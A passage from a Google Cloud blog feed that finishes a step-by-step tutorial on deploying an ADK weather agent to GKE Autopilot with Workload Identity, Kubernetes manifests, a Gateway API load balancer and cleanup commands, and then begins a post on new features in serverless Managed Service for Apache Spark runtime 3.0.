WORKDIR /app

# Copy the pre-built environment from the builder
COPY --from=builder /app/.venv /app/.venv
# Copy the application code (including weather_agent folder)
COPY . .

# Add the environment to the PATH
ENV PATH="/app/.venv/bin:$PATH"
ENV PYTHONUNBUFFERED=1

# Run the ADK API server
# We point to the weather_agent folder
CMD ["adk", "api_server", ".", "--host", "0.0.0.0", "--port", "8080"]&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Build and push the image to Artifact Registry:&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;# Create repository
gcloud artifacts repositories create adk-repo --repository-format=docker --location=$REGION

# Build and push
gcloud builds submit --tag $REGION-docker.pkg.dev/$PROJECT_ID/adk-repo/gke-agent:latest&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Step 5: Implementing Workload Identity for Security&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Security is paramount. Instead of hardcoding API keys, we use Workload Identity to grant the GKE pod permission to access Vertex AI.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;1. Create an IAM Service Account&lt;/strong&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;gcloud iam service-accounts create adk-gke-sa&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;2. Grant Vertex AI permissions&lt;/strong&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;gcloud projects add-iam-policy-binding $PROJECT_ID \

    --member="serviceAccount:adk-gke-sa@$PROJECT_ID.iam.gserviceaccount.com" \
    --role="roles/aiplatform.user"&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;3. Allow the Kubernetes Service Account to impersonate the IAM SA&lt;/strong&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;gcloud iam service-accounts add-iam-policy-binding adk-gke-sa@$PROJECT_ID.iam.gserviceaccount.com \
    --role="roles/iam.workloadIdentityUser" \
    --member="serviceAccount:$PROJECT_ID.svc.id.goog[default/adk-ksa]"&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Step 6: Deploying the Agent to GKE&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Now, we define the Kubernetes resources. Create a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;deployment.yaml&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; that includes the Service Account annotation for Workload Identity. Replace &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;$PROJECT_ID&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;$REGION&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; with your actual project ID and region.&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-plain"&gt;&lt;code&gt;apiVersion: v1
kind: ServiceAccount
metadata:
  name: adk-ksa
  annotations:
    iam.gke.io/gcp-service-account: adk-gke-sa@$PROJECT_ID.iam.gserviceaccount.com
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: adk-agent
spec:
  replicas: 2
  selector:
    matchLabels:
      app: adk-agent
  template:
    metadata:
      labels:
        app: adk-agent
    spec:
      serviceAccountName: adk-ksa
      containers:
      - name: adk-agent
        image: $REGION-docker.pkg.dev/$PROJECT_ID/adk-repo/gke-agent:latest
        resources:
          requests:
            cpu: "500m"
            memory: "512Mi"
          limits: 
            cpu: "1"
            memory: "1Gi"
        ports:
        - containerPort: 8080
---
apiVersion: v1
kind: Service
metadata:
  name: adk-service
spec:
  selector:
    app: adk-agent
  ports:
  - port: 80
    targetPort: 8080&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Apply the configuration:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;kubectl apply -f deployment.yaml&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Check the status of the deployment:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;kubectl get pods -w&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Once the pods are running, you can use kubectl port-forward to access the agent locally:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;kubectl port-forward svc/adk-service 8080:80&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Since we deployed the agent without Web UI, we can't access it at &lt;/span&gt;&lt;a href="http://localhost:8080" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;http://localhost:8080&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. However, we can still interact with it using the API and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;curl&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In a new terminal, run the following commands:&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;# Create a new session
curl -X POST http://localhost:8080/apps/weather_agent/users/u_123/sessions/s_123

# Run a message
curl -s -X POST http://localhost:8080/run \
-H "Content-Type: application/json" \
-d '{
"appName": "weather_agent",
"userId": "u_123",
"sessionId": "s_123",
"newMessage": {
    "role": "user",
    "parts": [{
    "text": "Hey whats the weather in new york today"
    }]
}
}' | jq .&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;curl&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; command will return the response in JSON format. The &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;jq&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; command is used to parse the JSON response and display it in a more readable format. . You should see a response like:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-plain"&gt;&lt;code&gt;{
    "sessionId": "s_123",
    "messages": [
        {
            "role": "assistant",
            "parts": [
                {
                    "text": "The weather in New York today is sunny with a high of 90 degrees Fahrenheit."
                }
            ]
        }
    ]
}&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;(Optional) Step 7: Exposing via Gateway API and HTTPS load balancer&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Finally, we expose the agent using the GKE Gateway API with a Google-managed TLS certificate. This is the recommended, production-grade approach — Google will automatically provision and renew the certificate for your domain.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;NB: GKE supports other options to provision certificates. You can use Let's Encrypt with cert-manager, pre-shared certificates, or any other certificate authority. You can check the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/secure-gateway#secure-using-ssl-certificate"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GKE documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for more details.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;First, reserve a static IP address for your load balancer:&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;gcloud compute addresses create adk-agent-ip --global
export AGENT_IP=$(gcloud compute addresses describe adk-agent-ip --global --format="value(address)")
echo "Your IP: $AGENT_IP"&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Point your domain's DNS &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;A&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; record at &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;$AGENT_IP&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. Example: &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;adk.mydomain.com&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Create a Google-Managed Certificate. Replace &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;adk.yourdomain.com&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; with your actual domain::&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;gcloud compute ssl-certificates create adk-cert --domains adk.yourdomain.com --global&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Create a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gateway.yaml&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; with the following content:&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-plain"&gt;&lt;code&gt;# Gateway: HTTPS load balancer with the managed certificate and static IP
apiVersion: gateway.networking.k8s.io/v1
kind: Gateway
metadata:
  name: adk-gateway
spec:
  gatewayClassName: gke-l7-global-external-managed
  listeners:
  - name: https
    protocol: HTTPS
    port: 443
    tls:
      mode: Terminate
      options:
        networking.gke.io/pre-shared-certs: adk-cert
  addresses:
  - type: NamedAddress
    value: adk-agent-ip
---
# HTTPRoute: forward traffic to the ADK service
apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: adk-route
spec:
  parentRefs:
  - name: adk-gateway
  hostnames:
  - "api.yourdomain.com"
  rules:
  - backendRefs:
    - name: adk-service
      port: 80
---
apiVersion: networking.gke.io/v1
kind: HealthCheckPolicy
metadata:
  name: adk-health
  namespace: default
spec:
  default:
    checkIntervalSec: 15
    timeoutSec: 5
    healthyThreshold: 1
    unhealthyThreshold: 2
    logConfig:
      enabled: false
    config:
      type: HTTP
      httpHealthCheck:
        port: 8080
        requestPath: /health
  targetRef:
    group: ""
    kind: Service
    name: adk-service&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Apply the configuration:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;kubectl apply -f gateway.yaml&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Certificate provisioning can take up to 20 minutes. Monitor the status with:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;gcloud compute ssl-certificates describe adk-cert --global&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Once the status shows &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;Active&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, your agent is live at &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;https://api.yourdomain.com&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. You can test it with:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;# Create a new session
curl -X POST https://api.yourdomain.com/apps/weather_agent/users/u_124/sessions/s_124

# Run a message
curl -s -X POST https://api.yourdomain.com/run \
-H "Content-Type: application/json" \
-d '{
"appName": "weather_agent",
"userId": "u_124",
"sessionId": "s_124",
"newMessage": {
    "role": "user",
    "parts": [{
    "text": "Hey whats the weather in new york today"
    }]
}
}' | jq .&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Conclusion &amp;amp; Looking Ahead&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By following these steps, you have successfully deployed a production-ready AI agent built with ADK onto GKE Autopilot that invokes Gemini on Vertex AI with Workload Identity for authentication. This setup ensures that your agent can scale horizontally to meet demand while maintaining a high security posture.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As you look ahead, consider integrating more complex tools or leveraging GKE's multi-cluster capabilities for even greater resilience. For more details on the technologies used here, explore the official &lt;/span&gt;&lt;a href="https://cloud.google.com/kubernetes-engine/docs"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GKE documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and the &lt;/span&gt;&lt;a href="https://github.com/google/adk" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;ADK repository&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To avoid ongoing charges, remember to delete the GKE cluster and the Artifact Registry repository when finished:&lt;/span&gt;&lt;/p&gt;
&lt;pre class="language-bash"&gt;&lt;code&gt;kubectl delete -f gateway.yaml
kubectl delete -f deployment.yaml
gcloud compute addresses delete adk-agent-ip --global
gcloud compute ssl-certificates delete adk-cert --global
gcloud container clusters delete $CLUSTER_NAME --region $REGION
gcloud artifacts repositories delete adk-repo --location $REGION&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description><pubDate>Thu, 04 Jun 2026 07:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/developers-practitioners/scaling-ai-agents-a-step-by-step-guide-to-deploying-adk-on-gke-autopilot/</guid><category>Developers &amp; Practitioners</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/images/Blog_Hero_Image_Resizing.max-600x600.png" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Scaling AI Agents: A Step-by-Step Guide to Deploying ADK on GKE Autopilot</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/images/Blog_Hero_Image_Resizing.max-600x600.png</image><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/developers-practitioners/scaling-ai-agents-a-step-by-step-guide-to-deploying-adk-on-gke-autopilot/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Abdel Sghiouar</name><title>Senior Cloud Developer Advocate</title><department></department><company></company></author></item><item><title>What’s new in serverless Managed Service for Apache Spark</title><link>https://cloud.google.com/blog/products/data-analytics/serverless-managed-service-for-apache-spark-runtime-3-0-features/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Whether you use it for data preparation, real-time interactive queries, AI model training, or something entirely different, running Apache Spark at scale is demanding — you shouldn’t have to manage the underlying infrastructure too.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Late last year, we &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/dataproc-serverless/docs/release-notes#December_04_2025"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;announced&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; the general availability (GA) of our serverless &lt;/span&gt;&lt;a href="https://cloud.google.com/products/managed-service-for-apache-spark"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Managed Service for Apache Spark&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; runtime version 3.0, prioritizing speed, simplicity, and reliability. Since then, customer use of Managed Service for Apache Spark for data science has nearly doubled year over year. This is a testament to our belief that using Google Cloud is the easier, smarter, and faster place to run your Apache Spark workloads. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this blog, let’s dive into a few key features that make our serverless Apache Spark offering a great fit for a wide range of workflows, including feature engineering, GPU-accelerated model training and tuning, semantic search, RAG, building AI agents and applications, and more.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Zero-setup onboarding&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The most significant barrier to entry for a cloud service is often the "time to magic moment" — the interval between creating a project and running your first workload. Previously, with serverless Spark, you still needed to manually configure IAM roles, VPC networking, and firewall rules before submitting a single job.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In the serverless Spark 3.0 runtime version, &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;zero-setup onboarding&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; significantly reduces the time to launch your first workload on serverless Spark. It does so by automating the following steps:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Permissions:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Necessary IAM roles and permissions are automatically provisioned to the appropriate service accounts.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Networking:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/dataproc-serverless/docs/concepts/network#private-google-access-requirement"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Private Google Access&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is auto-enabled on subnets, and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/dataproc-serverless/docs/concepts/network#automatically_created_regional_system_firewall_policy"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;system firewall policies&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; are configured automatically.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;API management&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Enabling APIs is now more efficient; you can just enable the Managed Service for Apache Spark API instead of manually having to enable several different APIs, as you did previously.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Fast startup for SLA-sensitive workloads&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Latency matters, especially for interactive data science and SLA-sensitive batch pipelines. Historically, serverless Spark startup times could take several minutes. With the 3.0 runtime, we’ve dropped startup times by 75% across both standard and premium tiers, delivered automatically without any code or configuration changes and at no additional cost. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This massive improvement qualifies serverless Spark for a much broader range of SLA-sensitive workloads, and we’re always looking to optimize startup times even further. &lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;"Serverless Spark allowed us to quickly reap benefits by removing the need for fine-grain machine management. This drove faster model development and significantly reduced our data processing costs." &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;- César Narnajo, Principal Engineer, Moloco&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-video"&gt;



&lt;div class="article-module article-video "&gt;
  &lt;figure&gt;
    &lt;a class="h-c-video h-c-video--marquee"
      href="https://youtube.com/watch?v=190tVajZgRI"
      data-glue-modal-trigger="uni-modal-190tVajZgRI-"
      data-glue-modal-disabled-on-mobile="true"&gt;

      
        

        &lt;div class="article-video__aspect-image"
          style="background-image: url(https://storage.googleapis.com/gweb-cloudblog-publish/images/yt_SnqmNb0.max-1000x1000.png);"&gt;
          &lt;span class="h-u-visually-hidden"&gt;Serverless data science: Seamless AI workflows with Spark and BigQuery&lt;/span&gt;
        &lt;/div&gt;
      
      &lt;svg role="img" class="h-c-video__play h-c-icon h-c-icon--color-white"&gt;
        &lt;use xlink:href="#mi-youtube-icon"&gt;&lt;/use&gt;
      &lt;/svg&gt;
    &lt;/a&gt;

    
  &lt;/figure&gt;
&lt;/div&gt;

&lt;div class="h-c-modal--video"
     data-glue-modal="uni-modal-190tVajZgRI-"
     data-glue-modal-close-label="Close Dialog"&gt;
   &lt;a class="glue-yt-video"
      data-glue-yt-video-autoplay="true"
      data-glue-yt-video-height="99%"
      data-glue-yt-video-vid="190tVajZgRI"
      data-glue-yt-video-width="100%"
      href="https://youtube.com/watch?v=190tVajZgRI"
      ng-cloak&gt;
   &lt;/a&gt;
&lt;/div&gt;

&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Better GPU obtainability&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Support for &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/managed-spark/docs/guides/dws-serverless"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Dynamic Workload Scheduler (DWS)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; Flex Start Mode in the serverless 3.0 runtime version allows serverless Spark to queue customer requests for a configurable duration when GPUs are unavailable. This feature addresses the obtainability challenges for high-demand accelerators like NVIDIA A100 and L4 that are the subject of frequent regional shortages. By pausing workloads until the necessary GPU capacity becomes accessible with DWS, you can dramatically increase obtainability and reliability for your latency-sensitive AI/ML workloads.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_L0aDvOP.max-1000x1000.jpg"
        
          alt="1"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;First-class support for Apache Spark 4.x&lt;/strong&gt;&lt;/h3&gt;
